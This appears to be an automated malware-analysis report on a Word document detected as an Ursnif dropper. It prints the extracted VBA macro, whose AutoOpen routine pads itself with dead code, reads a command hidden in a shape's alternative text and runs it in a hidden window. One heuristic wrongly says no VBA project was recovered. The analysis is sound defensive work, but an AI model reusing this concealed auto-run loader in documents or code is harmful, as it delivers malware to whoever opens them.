Malware Insights
ClamAV identifies the sample as malicious with the signature Doc.Dropper.Ursnif-6864686-0, indicating the Ursnif family. A critical heuristic also confirms the presence of an AutoOpen VBA macro. The extracted VBA module, saved as 'macros.bas', contains an AutoOpen subroutine that calls the 'mIOzlp' function. That function returns ActiveDocument.Shapes(2); AutoOpen then reads the shape's 'AlternativeText' property and passes it to 'Interaction.Shell' with vbHide, executing it as a hidden command. Because the command string lives in the shape's alternative text rather than in the macro source, a plain review of the macro code does not reveal it. This behaviour strongly suggests the macro is designed to download and execute a second-stage payload.
Heuristics (5)

- ClamAV: Doc.Dropper.Ursnif-6864686-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1661 bytes | 0df114fb0b7e9029b390a635260ef547fccc8a9900ca03ab1201d51b56a65d12 |
Preview script (first 1,000 lines of the extracted script):

```vba
' Module 1: the ThisDocument class module (attributes only, no procedures)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Module 2: standard module "rgulyri" holding the AutoOpen logic
Attribute VB_Name = "rgulyri"

' Returns the document's second shape; the surrounding arithmetic on
' randomly named variables is dead code inserted as padding.
Function mIOzlp()
    Dim ExuhlVDT As Integer
    Dim qfLEGz As Long
    ExuhlVDT = 4213# - 6229#
    Dim vgobukyhix As Variant
    vgobukyhix = ExuhlVDT - 9965#
    Dim xbymywejok As Integer
    Dim zdovohika As Long
    xbymywejok = 1334# - 9214#
    Dim rxoxobomux As Variant
    rxoxobomux = xbymywejok - 2321#
    Dim dtobohuki As Integer
    Dim pdyny As Long
    dtobohuki = 1226# - 3484#
    Dim HcrlkQ As Variant
    HcrlkQ = dtobohuki - 1714#
    Dim lcurajeme As Integer
    Dim CFxGXK As Long
    lcurajeme = 4867# - 7081#
    Dim vfalod As Variant
    vfalod = lcurajeme - 5116#
    Dim uLABPxXF As Integer
    Dim jporuji As Long
    uLABPxXF = 5526# - 1548#
    Dim dzuc As Variant
    dzuc = uLABPxXF - 4522#
    Set mIOzlp = ActiveDocument.Shapes(2)   ' the only meaningful statement
    Dim dxXzJp As Integer
    Dim TIhTgHWQ As Long
    dxXzJp = 1288# - 9586#
    Dim lfit As Variant
    lfit = dxXzJp - 3319#
End Function

' Runs automatically when the document is opened.
Sub AutoOpen()
    Dim rdTvuWr As Integer
    Dim AXaBP As Long
    rdTvuWr = 8177# - 6383#
    Dim gmiqa As Variant
    gmiqa = rdTvuWr - 7319#
    Dim TKVwf As Integer
    Dim pnomeleni As Long
    TKVwf = 6119# - 8926#
    Dim lfjOQ As Variant
    lfjOQ = TKVwf - 4487#
    Set fdenolomy = mIOzlp
    ' Command string is stored in the shape's alternative text, not in the macro
    vpuxiw = mIOzlp.AlternativeText
    ' Executes that string in a hidden window (note the "@" type-suffix trick
    ' and line continuation used to obscure the Shell call)
    Interaction.Shell@ _
        vpuxiw, vbHide
    Dim bpig As Integer
    Dim nrJCdSF As Long
    bpig = 3660# - 9365#
    Dim wcixyharex As Variant
    wcixyharex = bpig - 8503#
End Sub
```